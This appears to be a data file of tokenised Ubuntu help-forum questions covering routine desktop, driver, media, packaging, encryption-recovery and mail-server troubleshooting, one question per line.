391080	qt qml modules , how to import them and know what to import & qtmultimediakit 1.0	in the last question , ( how to insert video element in my ubuntu application ? ) i thought that i could create the video element with the qtmultimediakit1 . but i tried to import qtmultimediakit 1.0 and it does n't worked ! i eventually found out that i could import it with import qtmultimedia 5.0 . although it was working , i managed to find it in the software center . i noticed that the modules started with `` libqt ... '' . and there it is ! or there they are ! because i found out that the installed module ( qtmultimediakit 1.0 ) and the imported one ( qtmultimedia 5.0 ) are two different things ! not the same as the compiling error is the same as in the last question when i use qtmultimediakit 1.0 . what are the differences between both of them ? why wont the qtmultimediakit 1.0 work ? i saw some documentation about it : these are for c++ , are n't they ? http : //harmattan-dev.nokia.com/docs/library/html/qtmobility/multimedia.html ? tab=3 & q=qtmultimediakit & sp=all http : //doc.qt.digia.com/qt-mobility-snapshot/multimedia.html here , they are talking about qml ( and ... qtmultimediakit 1.1 ? ? ! ! ) http : //harmattan-dev.nokia.com/docs/library/html/qtmobility/qml-video.html ? tab=3 & q=qtmultimediakit & sp=all i tried with qtmultimediakit 1.1 instead of 1.0 but it 's the same problem : ( file path ) /configurebuttontab.qml:4 module `` qtmultimediakit '' is not installed /usr/lib/x86_64-linux-gnu/qt5/bin/qmlscene exited with code 255 i 'm still under 13.10 and with qt creator 2.8.1 based on qt 5.0.2 ( gcc 4.7.3 , 64 bit ) built on sep 16 2013 at 12:02:18 . p.s . : a little additionnal question : how can i know what to install to have the right module ? for instance , the 3d module : i have something installed but i do not know what to import and if it 's realy the right module ( the installed-one is : qt 3d module : libqt53d5 ) thank you ! : )
391082	how to see time stamps in bash history ?	is there any way i can see at what time the commands were executed from the bash history ? we can see the order but is there any way i can get the time also ? bottom-line : execution time in the bash history
391083	how can i check my favorated commands from the terminal ?	is there way any i can see the how many number of times a command has got executed in my terminal with count on it ? thank you .
391088	what is the minimal installation to run .net application created in c # by monodevelop ?	i am a bit noobish when it comes to .net but i am wondering what is the bare minimum of packages needed to be installed to run .net application . it is a simple input output console app and with command : app_name.exe it runs on my computer but when i try to run it on another computer ( which does n't have monodevelop and all that stuff ) it returns error : can not execute binary file so i am wondering what are the minimum in terms of size packages that need to be installed ?
391089	how to change the time server in ubuntu 12.04 lts without installing the `ntp` package	i am on ubuntu 12.04 lts , in the dialog `` time and date settings '' there is a set of radio buttons labeled as `` set the time '' , the two options are `` manually '' and `` automatically from the internet '' : my current selection is `` automatically from the internet '' and i am fine with that apart from the fact that i would like to change the synchronization server ( i would like to set it to ntp1.inrim.it ) . is it possible without installing the ntp package ? i did not find any way to change the server from the dialog .
391090	kicked out back to login . no cinnamon installed	i have a clean install of 13.10 without cinnamon . i used it happily for a while , until it stopped letting me in : after i type in the password , it kicks me back to the password prompt . the only unusual thing that i did before that was using pm-hibernate ( after which this command did not work the second time ) . i saw the related posts , tried removing .xauthority , resetting permissions on the home directory etc. , nothing helps . please help me out ! meir
391091	how to close the mouth of chromium for asking gnome-keyring password ?	i use ubuntu 13.10 . i do n't like to put my password at each time . how to attain the logging without password entry ?
391093	changed the user password , but now i ca n't access my encrypted folder	i changed my user password , but now i ca n't enter my encrypted folder when i login , i need to type ecryptfs-mount-private and type in the old password . i changed it from system tools- > users and groups . if i change my user password back to the old password , it starts working automatically again . how do i manually change the encrypted folder 's password to be my new password ?
391095	ubuntu 12.04 not loading	i recently upgraded my ubuntu os from 11.04 to 11.10 to 12.04 lts version . while updating to 11.10 it work fine without any problems.on updating to 12.04 on booting , the screen freeze on the ubuntu logo with five dots and does not load any further . i have no clue on how to proceed . please help
391098	mouse unresponsive	i am new to this operating system . i always having used windows . but decided to look into a different os since all my computers are working on xp which will be unsupported soon . anyhow , i download ubuntu 12.04 onto a flash drive , it will open up and see the start screen , but my mouse is unresponsive . i must say the layout looks fantastic , and i am anxious to start using it . are there any manuals i can look at online ?
391100	what happens when a package is duplicate in sources ?	i 'm just about to install owncloud . i found an owncloud package in the standard ubuntu sources . but the instructions say , i need to add a new softwaresource . so what happens , after i added the source and i do sudo apt-get install owncloud ? which package will be installed ? and how does apt-get know which package it should install ? [ edit ] thanks to braiams post , here is the versiontable of owncloud . just to show you how it looks like : owncloud : installiert : 6.0.0a-0 installationskandidat : 6.0.0a-0 versionstabelle : *** 6.0.0a-0 0 500 http : //download.opensuse.org/repositories/isv : owncloud : community/xubuntu_13.10/ packages 100 /var/lib/dpkg/status 5.0.12+dfsg-1ubuntu1~saucy1 0 500 http : //de.archive.ubuntu.com/ubuntu/ saucy-updates/universe amd64 packages 5.0.10+dfsg-1ubuntu1 0 500 http : //de.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages
391101	does trim work with fat32 ?	i used this webupd8 guide to help me trim my ssd on ubuntu 13.10 . the guide says that `` you must make sure the partition ( s ) are ext4 or btrfs '' . unfortunately , i stupidly assumed the hd was formatted to ext4 ; it 's actually fat32 . the var/log/trim suggests that it 's working : *** sun , 15 dec 2013 11:30:42 +0000 *** / : 50567962624 bytes were trimmed but is it actually doing something ? or will i have to re-format the drive and start all over again ? sorry if this sounds a little paranoid . any reassurance much appreciated .
391102	configuring lubuntu to run a script when lxde starts	i 'm using lubuntu and lxde . how can i configure it such that when lxde starts , it runs the following script to turn off the trackpad : xinput disable 14 i tried to make the files ~/.config/autostart/ as [ desktop entry ] type=application exec=xinput disable 14 and the file .desktop as [ desktop entry ] type=application exec=xinput disable 14 startupnotify=false terminal=false hidden=false also , i did n't found anything suitable in the program lxsession-edit .
391110	xrandr works at startup , but when i type something , the bad brightness returns	i put a script for xrandr working at startup , its good . but when i type something , the bad brightness returns . when i re-put `` xrandr -- output lvds1 -- brightness 0.55 '' on a terminal , all is good . why this problem after the starting of my session ?
391114	do you know how to enable hdmi sound without using bios ?	running ubuntu 13.10 on a new compaq cq58 any ideas cause on sound settings it does not give the option in output
391118	how can i repair skype ? sound is not working	i am new to ubuntu ... i managed to install linux by my own and lots of programms as well but still have a problem ... sound on skype does n't work . i forgot to mention that i have 12.04 lts on my laptop - > hp pavilion g6 series . thanks
391122	how can i burn vobsub subtitles using ffmpeg ?	i have an mkv that i am using to create a dvd using devede the mkv has embedded subtitles in vobsub format , which devede does not support ( or bugged , not sure ) i decided to burn the subtitles to the output using the extra ffmpeg parameters option , which i took from here : https : //trac.ffmpeg.org/wiki/how % 20to % 20burn % 20subtitles % 20into % 20the % 20video so i 've updated to the latest ffmpeg and added the following extra parameters : -filter_complex `` [ 0 : v ] [ 0 : s ] overlay [ v ] '' -map [ v ] -map 0 : a so the complete command is : ffmpeg -i ~/input.mkv -vf scale=720:412 , fifo , pad=720:576:0:82:0x000000 -y -target pal-dvd -sn -acodec copy -g 12 -t 60.0 -ac 2 -s 720x576 -threads 3 -trellis 1 -mbd 2 -b 2616000 -aspect 16:9 /var/tmp/previewfile_01_01.mpg -filter_complex `` [ 0 : v ] [ 0 : s ] overlay [ v ] '' -map [ v ] -map 0 : a but out of devede i get : [ avfiltergraph @ 0xa744ca0 ] no such filter : ' '' ' running it in a shell gets : output pad `` default '' with type video of the filter instance `` parsed_overlay_0 '' of overlay not connected to any destination the documentation for the filter is here : http : //ffmpeg.org/ffmpeg-filters.html # overlay-1 but i ca n't make head or tail of it . the -map parameters a mystery as well . here 's the details the streams : stream # 0:0 ( eng ) : video : h264 ( high ) , yuv420p ( tv , smpte170m ) , 720x336 [ sar 21845:18873 dar 109225:44037 ] , sar 199:172 dar 2985:1204 , 23.98 fps , 23.98 tbr , 1k tbn , 180k tbc ( default ) stream # 0:1 ( eng ) : audio : ac3 , 48000 hz , stereo , fltp , 192 kb/s ( default ) stream # 0:2 ( eng ) : subtitle : dvd_subtitle , 720x480 complete output from devede : launching program : ffmpeg -i ~/input.mkv -vf scale=720:412 , fifo , pad=720:576:0:82:0x000000 -y -target pal-dvd -sn -acodec copy -g 12 -t 60.0 -ac 2 -s 720x576 -threads 3 -trellis 1 -mbd 2 -b 2616000 -aspect 16:9 /var/tmp/previewfile_01_01.mpg -filter_complex `` [ 0 : v ] [ 0 : s ] overlay [ v ] '' -map [ v ] -map 0 : a elemento : /usr/bin ffmpeg version n-59114-gcc0e2ba copyright ( c ) 2000-2013 the ffmpeg developers input # 0 , matroska , webm , from '~/input.mkv ' : duration : 03:03:11.13 , start : 0.000000 , bitrate : 898 kb/s chapter # 0.0 : start 0.000000 , end 232.982856 metadata : title : chapter 1 chapter # 0.1 : start 232.982856 , end 479.729356 metadata : title : chapter 2 chapter # 0.2 : start 479.729356 , end 573.322856 metadata : title : chapter 3 chapter # 0.3 : start 573.322856 , end 1007.089522 metadata : title : chapter 4 chapter # 0.4 : start 1007.089522 , end 1375.590989 metadata : title : chapter 5 chapter # 0.5 : start 1375.590989 , end 2044.258989 metadata : title : chapter 6 chapter # 0.6 : start 2044.258989 , end 2395.443156 metadata : title : chapter 7 chapter # 0.7 : start 2395.443156 , end 2863.110356 metadata : title : chapter 8 chapter # 0.8 : start 2863.110356 , end 3193.657244 metadata : title : chapter 9 chapter # 0.9 : start 3193.657244 , end 3327.290744 metadata : title : chapter 10 chapter # 0.10 : start 3327.290744 , end 3801.214189 metadata : title : chapter 11 chapter # 0.11 : start 3801.214189 , end 4209.622189 metadata : title : chapter 12 chapter # 0.12 : start 4209.622189 , end 4484.897189 metadata : title : chapter 13 chapter # 0.13 : start 4484.897189 , end 4971.299778 metadata : title : chapter 14 chapter # 0.14 : start 4971.299778 , end 5710.371444 metadata : title : chapter 15 chapter # 0.15 : start 5710.371444 , end 5999.627078 metadata : title : chapter 16 chapter # 0.16 : start 5999.627078 , end 6423.417111 metadata : title : chapter 17 chapter # 0.17 : start 6423.417111 , end 6593.470322 metadata : title : chapter 18 chapter # 0.18 : start 6593.470322 , end 7171.923244 metadata : title : chapter 19 chapter # 0.19 : start 7171.923244 , end 7462.630322 metadata : title : chapter 20 chapter # 0.20 : start 7462.630322 , end 8388.505278 metadata : title : chapter 21 chapter # 0.21 : start 8388.505278 , end 8734.233989 metadata : title : chapter 22 chapter # 0.22 : start 8734.233989 , end 9171.087078 metadata : title : chapter 23 chapter # 0.23 : start 9171.087078 , end 9439.688744 metadata : title : chapter 24 chapter # 0.24 : start 9439.688744 , end 9770.936322 metadata : title : chapter 25 chapter # 0.25 : start 9770.936322 , end 10253.918822 metadata : title : chapter 26 chapter # 0.26 : start 10253.918822 , end 10732.396822 metadata : title : chapter 27 chapter # 0.27 : start 10732.396822 , end 10991.130000 metadata : title : chapter 28 stream # 0:0 ( eng ) : video : h264 ( high ) , yuv420p ( tv , smpte170m ) , 720x336 [ sar 21845:18873 dar 109225:44037 ] , sar 199:172 dar 2985:1204 , 23.98 fps , 23.98 tbr , 1k tbn , 180k tbc ( default ) stream # 0:1 ( eng ) : audio : ac3 , 48000 hz , stereo , fltp , 192 kb/s ( default ) stream # 0:2 ( eng ) : subtitle : dvd_subtitle , 720x480 please use -b : a or -b : v , -b is ambiguous [ avfiltergraph @ 0x9c18ca0 ] no such filter : ' '' ' error configuring filters . creating window /usr/share/devede/werror_dialog.ui if i copy that command to a shell the output is different : $ ffmpeg -i ~/input.mkv -vf scale=720:412 , fifo , pad=720:576:0:82:0x000000 -y -target pal-dvd -sn -acodec copy -g 12 -t 60.0 -ac 2 -s 720x576 -threads 3 -trellis 1 -mbd 2 -b 2616000 -aspect 16:9 /var/tmp/previewfile_01_01.mpg -filter_complex `` [ 0 : v ] [ 0 : s ] overlay [ v ] '' -map [ v ] -map 0 : a ffmpeg version n-59114-gcc0e2ba copyright ( c ) 2000-2013 the ffmpeg developers built on dec 15 2013 05:22:20 with gcc 4.6 ( debian 4.6.3-1 ) configuration : -- prefix=/root/ffmpeg-static/32bit -- arch=x86_32 -- extra-cflags='-m32 -i/root/ffmpeg-static/32bit/include -static ' -- extra-ldflags='-m32 -l/root/ffmpeg-static/32bit/lib -static ' -- extra-libs='-lxml2 -lexpat -lfreetype ' -- enable-static -- disable-shared -- disable-ffserver -- disable-doc -- enable-bzlib -- enable-zlib -- enable-postproc -- enable-runtime-cpudetect -- enable-libx264 -- enable-gpl -- enable-libtheora -- enable-libvorbis -- enable-libmp3lame -- enable-gray -- enable-libass -- enable-libfreetype -- enable-libopenjpeg -- enable-libspeex -- enable-libvo-aacenc -- enable-libvo-amrwbenc -- enable-version3 -- enable-libvpx libavutil 52 . 58.100 / 52 . 58.100 libavcodec 55 . 45.101 / 55 . 45.101 libavformat 55 . 22.100 / 55 . 22.100 libavdevice 55 . 5.102 / 55 . 5.102 libavfilter 3 . 92.100 / 3 . 92.100 libswscale 2 . 5.101 / 2 . 5.101 libswresample 0 . 17.104 / 0 . 17.104 libpostproc 52 . 3.100 / 52 . 3.100 trailing options were found on the commandline . input # 0 , matroska , webm , from '~/input.mkv ' : duration : 03:03:11.13 , start : 0.000000 , bitrate : 898 kb/s chapter # 0.0 : start 0.000000 , end 232.982856 metadata : title : chapter 1 chapter # 0.1 : start 232.982856 , end 479.729356 metadata : title : chapter 2 chapter # 0.2 : start 479.729356 , end 573.322856 metadata : title : chapter 3 chapter # 0.3 : start 573.322856 , end 1007.089522 metadata : title : chapter 4 chapter # 0.4 : start 1007.089522 , end 1375.590989 metadata : title : chapter 5 chapter # 0.5 : start 1375.590989 , end 2044.258989 metadata : title : chapter 6 chapter # 0.6 : start 2044.258989 , end 2395.443156 metadata : title : chapter 7 chapter # 0.7 : start 2395.443156 , end 2863.110356 metadata : title : chapter 8 chapter # 0.8 : start 2863.110356 , end 3193.657244 metadata : title : chapter 9 chapter # 0.9 : start 3193.657244 , end 3327.290744 metadata : title : chapter 10 chapter # 0.10 : start 3327.290744 , end 3801.214189 metadata : title : chapter 11 chapter # 0.11 : start 3801.214189 , end 4209.622189 metadata : title : chapter 12 chapter # 0.12 : start 4209.622189 , end 4484.897189 metadata : title : chapter 13 chapter # 0.13 : start 4484.897189 , end 4971.299778 metadata : title : chapter 14 chapter # 0.14 : start 4971.299778 , end 5710.371444 metadata : title : chapter 15 chapter # 0.15 : start 5710.371444 , end 5999.627078 metadata : title : chapter 16 chapter # 0.16 : start 5999.627078 , end 6423.417111 metadata : title : chapter 17 chapter # 0.17 : start 6423.417111 , end 6593.470322 metadata : title : chapter 18 chapter # 0.18 : start 6593.470322 , end 7171.923244 metadata : title : chapter 19 chapter # 0.19 : start 7171.923244 , end 7462.630322 metadata : title : chapter 20 chapter # 0.20 : start 7462.630322 , end 8388.505278 metadata : title : chapter 21 chapter # 0.21 : start 8388.505278 , end 8734.233989 metadata : title : chapter 22 chapter # 0.22 : start 8734.233989 , end 9171.087078 metadata : title : chapter 23 chapter # 0.23 : start 9171.087078 , end 9439.688744 metadata : title : chapter 24 chapter # 0.24 : start 9439.688744 , end 9770.936322 metadata : title : chapter 25 chapter # 0.25 : start 9770.936322 , end 10253.918822 metadata : title : chapter 26 chapter # 0.26 : start 10253.918822 , end 10732.396822 metadata : title : chapter 27 chapter # 0.27 : start 10732.396822 , end 10991.130000 metadata : title : chapter 28 stream # 0:0 ( eng ) : video : h264 ( high ) , yuv420p ( tv , smpte170m ) , 720x336 [ sar 21845:18873 dar 109225:44037 ] , sar 199:172 dar 2985:1204 , 23.98 fps , 23.98 tbr , 1k tbn , 180k tbc ( default ) stream # 0:1 ( eng ) : audio : ac3 , 48000 hz , stereo , fltp , 192 kb/s ( default ) stream # 0:2 ( eng ) : subtitle : dvd_subtitle , 720x480 please use -b : a or -b : v , -b is ambiguous output pad `` default '' with type video of the filter instance `` parsed_overlay_0 '' of overlay not connected to any destination how to i burn that subtitle stream to the output video ?
391123	how to run g++-4.7 installed in the machine using g++ command ?	i am using ubuntu 13.10 ( saucy ) . i installed g++-4.7 in my machine . but when i tried to run g++ or tried to check the version it is showing that the package is not installed . $ g++ -- version the program 'g++ ' can be found in the following packages : * g++ * pentium-builder try : sudo apt-get install < selected package > sudo apt-get install g++ or sudo apt-get install g++-4.8 is not successful in my machine because of some broken packages which i could n't resolve . please help me to use g++ with 4.7 version . thanks in advance .
391125	lexmark 4300 series printer	there is no driver for my 4300 series lexmark printer , i tried to use the program wine to install the driver but this did not work . can anyone take a look at this problem ?
391127	images pasted/embedded in writer document disappears when exported to pdf	pictures/images/graphics/eps embedded in lo 4.1 writer document disappears when exported to pdf . what should i do ?
391131	inspiron laptop for dell	i have a dell inspiron laptop computer when i turn on the computer it asks for a system or administrative password when i enter that it takes me to a user screen how do i get another user and password
391132	black screen on booting	i 've been working with ubuntu on my lenovo for awhile . after heavy using i started to face the black screen when i reboot . cursor at the top left blinking with the sound of rebooting . i still see the mouse pointer . i had to hold ctrl+alt with f1 to work around that . after entering my credentials , i typed in `` sudo service lightdm -- full-restart '' , so it works fine . i still face this issue every time i reboot . my question is what might cause this problem ? how do i fix it permanently ? . nota : i had to replace lightdm with gdm in oreder to work , although , i do n't like gdm .
391134	how can i override some pages without numbering in libreoffice writer	how can i override some pages without numbering in libreoffice writer ? for example : i want to write document with 20 pages ( numbering in the footer ) but the pages ( 1st , 10th , 15th and 20th ) without numbers .
391137	is there a way to automatically record voice calls using bluethooth from an android phone ?	i am using ubuntu and android 4.3 i watched this : http : //www.youtube.com/watch ? v=57ppfe_pena and i think it will be great if there is such option for ubuntu . i want every time i am near my laptop , it will automatic record the calls from my cell phone .
391139	re-install grub in ubuntu partition	i had been using easybcd in windows to manage the bootloader . but , when i resized my ubuntu partition , grub went haywire and now i am stuck with using grub at the mbr level ( i had to use boot repair to make it work ) .help .
391141	keyboard responds with delay	the keyboard stopped functioning properly lately . to type in a character , i have to hold the key for a second before it accepts it . strangely , it works fine on the guest session .
391143	triple screen desktop	i am using ubuntu 12.04 lts and i want to have a triple monitor setup for the desktop . here are my gpu cards : 01:00.0 vga compatible controller : nvidia corporation gf110 [ geforce gtx 580 ] ( rev a1 ) 02:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 210 ] ( rev a2 ) 03:00.0 vga compatible controller : nvidia corporation gf110 [ geforce gtx 580 ] ( rev a1 ) the two gtx 580 are bridged in sli to drive the center screen only ( for 120hz gaming in win8 ) , and the g 210 drives the two 19 '' for extended desktop . here are my monitors samsung 27 '' 1920x1080 ( center ) acer 19 '' 1280x1024 ( right ) bluesky 19 '' 1280x1024 ( left ) i 've activated proprietary nvidia drivers ( version 319 ) and tried to use the `` nvidia x server settings '' to get the same config as under win8 , but no luck : ( the closest result i achieved was using separate x-screens on each monitor , but i 'm unable to move windows from a monitor to an other . on one side , each time i try to enable xinerama , it fails to restart x and i have to restore the default xorg.conf ( seems it 's due to different gpus ) on the other side , i can only enable twinview on side sreens , as they are on the same gpu . so my question is simple : how can i have a triple monitor setup with my hardware ? i ca n't beleive all linux users with triple screens run with two identical gpu . i 'm ready to change any software part ( kernel , driver , wm ... ) but i have to keep the same hardware configuration ( one 120hz screen on 580 sli , rest on 210 ) for windows gaming .
391144	asus usb-n66 issue	i recently bought a asus usb-n66 to use with my laptop . the n66 was bought to boost my wireless connection , since the internal wireless network card of the laptop does n't reach as far as the n66 . for some reason , however , the n66 works fine for a while , and the suddenly stops working . this happens even when i 'm away from the computer . i 've managed to get som syslog messages that may be of relevance : dec 15 14:17:29 laptop wpa_supplicant [ 1490 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=0 dec 15 14:17:29 laptop networkmanager [ 847 ] : < info > ( ra0 ) : supplicant interface state : disconnected - > scanning dec 15 14:17:32 laptop wpa_supplicant [ 1490 ] : trying to associate with 34:08:04 : d8:6f:5c ( ssid='fenderbender ' freq =2457 mhz ) dec 15 14:17:32 laptop wpa_supplicant [ 1490 ] : association request to the driver failed dec 15 14:17:32 laptop networkmanager [ 847 ] : < info > ( ra0 ) : supplicant interface state : scanning - > associating dec 15 14:17:32 laptop wpa_supplicant [ 1490 ] : associated with 34:08:04 : d8:6f:5c dec 15 14:17:32 laptop networkmanager [ 847 ] : < info > ( ra0 ) : supplicant interface state : associating - > 4-way handshake dec 15 14:17:32 laptop wpa_supplicant [ 1490 ] : wpa : key negotiation completed with 34:08:04 : d8:6f:5c [ ptk=ccmp gtk=ccmp ] dec 15 14:17:32 laptop wpa_supplicant [ 1490 ] : ctrl-event-connected - connection to 34:08:04 : d8:6f:5c completed ( reauth ) [ id=0 id_str= ] dec 15 14:17:32 laptop networkmanager [ 847 ] : < info > ( ra0 ) : supplicant interface state : 4-way handshake - > completed dec 15 14:17:54 laptop wpa_supplicant [ 1490 ] : ctrl-event-disconnected bssid=34:08:04 : d8:6f:5c reason=0 dec 15 14:17:54 laptop networkmanager [ 847 ] : < info > ( ra0 ) : supplicant interface state : completed - > disconnected dec 15 14:17:54 laptop wpa_supplicant [ 1490 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=0 dec 15 14:17:54 laptop networkmanager [ 847 ] : < info > ( ra0 ) : supplicant interface state : disconnected - > scanning dec 15 14:17:57 laptop wpa_supplicant [ 1490 ] : trying to associate with 34:08:04 : d8:6f:5c ( ssid='fenderbender ' freq=2457 mhz ) dec 15 14:17:57 laptop wpa_supplicant [ 1490 ] : association request to the driver failed dec 15 14:17:57 laptop networkmanager [ 847 ] : < info > ( ra0 ) : supplicant interface state : scanning - > associating dec 15 14:17:57 laptop wpa_supplicant [ 1490 ] : associated with 34:08:04 : d8:6f:5c i 'm sure you 'll need more information to get me started debugging this , so please advice on what more you need . edit 1 : some more system info , hoping that it 's relevant : output from `` uname -a '' : linux laptop 3.2.0-57-generic # 87-ubuntu smp tue nov 12 21:35:10 utc 2013 x86_64x86_64 x86_64 gnu/linux output from `` cat /etc/lsb-release '' : distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.3 lts '' output from `` lshw '' is available here : https : //dl.dropboxusercontent.com/u/11093463/feils % c3 % b8ke % 20n66/lshw.txt and let me add : i installed the driver by following this guide : http : //www.makeuseof.com/tag/asus-usb-n66-dual-band-wireless-n900-usb-network-adapter-review-and-giveaway/
391147	fb messenger steals focus	i am using the facebook messenger app for unbuntu and unset the popups option configuration options . however , whenever a message arrives the window grabs focus , which is , as you can imagine , rather irritating . how do i stop this happening ? i am using ubuntu 13.10 with cinnamon . thanks
391148	is possible to record midi via usb from a roll up piano ?	i have a roll up piano ( see the image ) that has an usb output . an usb cable comes with it : it is able to connect the roll up piano with the computer . is there any way to record midi using the roll up piano , the usb cable and the computer ( that runs ubuntu ) ? is a midi cable really required if i have the usb one ? what are the steps to record midi on ubuntu using the roll up piano and the usb cable ? the output of arecordmidi -l : # no cable is connected ( after fresh restart ) $ arecordmidi -l port client name port name 14:0 midi through midi through port-0 # usb only $ arecordmidi -l port client name port name 14:0 midi through midi through port-0 24:0 usb midi interface usb midi interface midi 1 # midi only $ arecordmidi -l port client name port name 14:0 midi through midi through port-0 # usb & midi $ arecordmidi -l port client name port name 14:0 midi through midi through port-0 24:0 usb midi interface usb midi interface midi 1 i tried to use qjackctl and some other applications to make the connections :
391151	unbuntu 12.04.1	how to properly boot ubuntu 12.04.1 from flash drive ? i 've tried to boot it using poweriso and after it finish downloading amd64.tar.xz , it gets an error message about not being able download the necessary files.. my internet connection was never interrupted . i shut down the laptop and rebooted using f12 to select boot from usb , i get an error message about missing boot manager..
391155	how to grant permissions for a file automatically ?	when i try to run a python file , say hello.py , it prompts bash : ./hello.py : permission denied so i need to chmod u+x hello.py before i run it . is it possible to automatically grant access to all python file as soon as they are created ?
391157	microsoft office windows 7 style on ubuntu ( with wine ? )	i am using wine and play on linux to launch microsoft office applications . i can change the button style to a seven-like style , but i wonder how they changed the border of the app in this video . ubuntu tablet full video min . 5:30 how to do it ?
391162	how to recover passphrase for ecryptfs	i read this question ca n't log in after password change ( ecryptfs ) but unfortunatelly it has not answer . i do n't know why cryptfs-recovery-private asks me mount passphrase is it login pass or what ? and why it 32 symbols ? where i can see this passpshrase or better to say ? where saved those passphrases ? i have following result in logs : incorrect wrapping key for `` user '' error atempting to wrap passphrase from file ... . how to recover it ? i just read that it is possible to compare .sid inside .private directory and new passphrases or it is something wrong ?
391163	aircrack-ng svn error 1	i 've already downloaded aircrack-ng from the svn repo and i 'm trying to build it from source and this is what i get : make -c src all make [ 1 ] : entering directory `/home/chris/aircrack-ng/src' gcc -g -w -wall -o3 -d_file_offset_bits=64 -d_revision=2363 -dconfig_libnl30 -i/usr/include/libnl3 -wno-unused-but-set-variable -wno-array-bounds -iinclude wpaclean.o osdep/radiotap/radiotap-parser.o -o wpaclean -losdep -losdep -lnl-genl-3 -lnl-3 /usr/bin/ld : can not find -lnl-genl-3 collect2 : error : ld returned 1 exit status make [ 1 ] : *** [ wpaclean ] error 1 make [ 1 ] : leaving directory `/home/chris/aircrack-ng/src' make : *** [ all ] error 2 i 'm compiled it before but i did an upgraded clean install of linux mint 16 but now for some reason i 'm missing something . any help would be great ! thanks in advance !
391164	manipulate files with wildcard characters in filename	i just discovered that i can actually created a file named *.txt in ubuntu . suppose i have a.txt b.txt and *.txt in my current directory . how can i delete the third one using terminal ? ( rm *.txt will delete all )
391166	will booting ubuntu in my samsung np550p5c-s06in brick it ?	i bought this laptop in july,2013 ... and it was manufactured in march ... i wanted to dual boot it with ubuntu ( using wubi ) and windows 8.1 ( running now ) . can it harm my computer ? if yes then is there any way to prevent it ?
391169	how to enable tear free in terminal ?	how to enable tear free for my intel processor in ubuntu 12.04 from the terminal ? i have some random flashing pages problem for 1-2 seconds when playing online games with chrome . i already enabled sna acceleration , but i do n't know how to enable tear free .
391173	how to find the frequency and type of my current ram ?	how shall i find out the frequency and type of my current ram ? my os is ubuntu 12.04 .
391176	xubuntu desktop shuts down and goes to login screen	i will be humming along just fine and then all of a sudden the desktop shuts down and goes to the login screen . i can then put my password back in and it will open back up the desktop . it does not show any error notifications that are visible . i installed lubuntu along alongside xbuntu to see if that would correct the problem but lubuntu does the same thing . does anyone have any ideas as to what could be happening ? thank you for your time .
391177	my screen got scratches or distorted in few minutes after install ubuntu 12.4 lts	i have succesfully installed ubuntu 12.04 lts but after few minutes it 's showing scratches i mean it got fully distorted screen how to resolve this issue please help i 'm using jetway motherboard without graphics card , 4gb ram , and amd sempron processor please help how to resolve it , i will be very thankful for you .
391181	color calibration on asus f3j , do n't have `` shared-color-targets ''	how to calibrate web camera from my asus f3j ? i try to calibrate but i 'm getting a error that says i do n't have `` shared-color-targets '' . please help me because my integrated web camera is up-side-down in skype and i 'm trying to fix it whit no results .
391184	`` but is referred to by another package . '' - finding that package	it is not unusual for an ubuntu ( or other distro with apt package management ) user to encounter the error : user @ box ~ $ sudo apt-get install x [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done package x is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'x ' has no installation candidate there have been several questions asked concerning this on various stackexchange sites , for example openvpn on askubuntu , but these are generally about how to obtain the specific package despite the error . i have found no package that is not found simply ( though not always easily ) by determining if it is still distributed , and under which repository if so , and ensuring that repository is in apt.sources , or the worst comes to the worst downloading a .deb or source to compile . so my question is more general , and although i am guessing it has a rather simple and therefore non-exciting answer i can not think how to find it by conventional search engine methods , so i turn to askubuntu : is there a command or option i can use to determine what package / which packages reference the missing package ?
391187	rollback gpt after failed 13.10 installation	upon trying to install ubuntu 13.10 x64 in efi mode on /dev/sda8 over an earlier ( also failed ) 13.04 64bit partition , i selected the partitioning option : '' replace existing ubuntu 13.04 installation '' thinking that only /dev/sda8 would be wiped , not the entire 500gb disk . clearly that was a misunderstanding ... .a disastrously unclear one , it turned out . now all my other gpt partitions are gone : the oem windows 8 , all the previous data/programs/user files , system , recovery , boot , 16gb windows image rollback/restore , boot , efi , etc . no more `` windows bootloader '' option after f12 key upon bios bootup . of course , no ubuntu boot option is present either . never was , always failed in mid-installation , even with 13.04 and 12.04 64bit versions . ( yet this is a new 6gb amd laptop with new harddisk , four different usb keys or dvd install disks tested to rule out media failures , etc . ) in live mode , off a usb key , gparted only shows three new partitions , automatically made by the ubuntu installer . the efi boot area , the ubuntu main , and swap at end . none of which are important to me in comparison to the old partitions and structure . question , how can i roll back to the previous gpt partition table ? where on the disk might be backups stored , and for the previous windows bootloader too ? what could make this recovery process easiest , since i can not easily remove the harddisk from the laptop , due to the way it 's built ? even if 7gb+ of random data might already be damaged .
391188	ubuntu 12.10 netbook causing internet connection to drop for all computers on network	i have a asus eeepc 1005ha netbook running 12.10 . when i use the above named netbook , the wireless internet connection drops out typically every 3 mins or so . however the connection drops for all computers on my wireless network , usually a win7 laptop and a macbook pro ( in case that helps ) . this does not happen at all when the eeepc netbook is not being used , but the other 2 machines are being used . when the other computers are not in use , the netbook connection is fine . i have done quite a bit of searching , but all results i found corresponded to wireless dropping only on the ubuntu machine . thanks in advance ! : )
391189	ubuntu iso downloading another iso file	ubuntu iso file is again downloading the file from the installation and if i proceed with the internet connection closed then in middle of the installation it crashes saying that the files is corrupted
391190	sata pci not seen by bios but is seen by ubuntu ( in lspci )	i have installed a raid 5 controller card url http : //www.amazon.co.uk/product-reviews/b0058m903s/ref=dp_top_cm_cr_acr_txt ? ie=utf8 & showviewpoints=1 , it is seen in linux under lspci so it is being seen by the system . however , when i put hdd containing the os into the controller , the system does not boot and the drive is not seen in the computer bios any advice will be highly appreciated
391192	how to send e-mail as a domain name ?	i would like to create an ubuntu webserver ( with postfix on it ) to send e-mails to different users from a static domain name ; website.com i do have access to the following dns records website.com the needed situation : the server needs to send e-mails to customers from password @ domain.com ( for forgotten e-mail delivery ) , the webserver with postfix on it has a different ip address then the main website : website.com btw : i can not install postfix on the website it 's server ( security reasons ) thanks in advance !
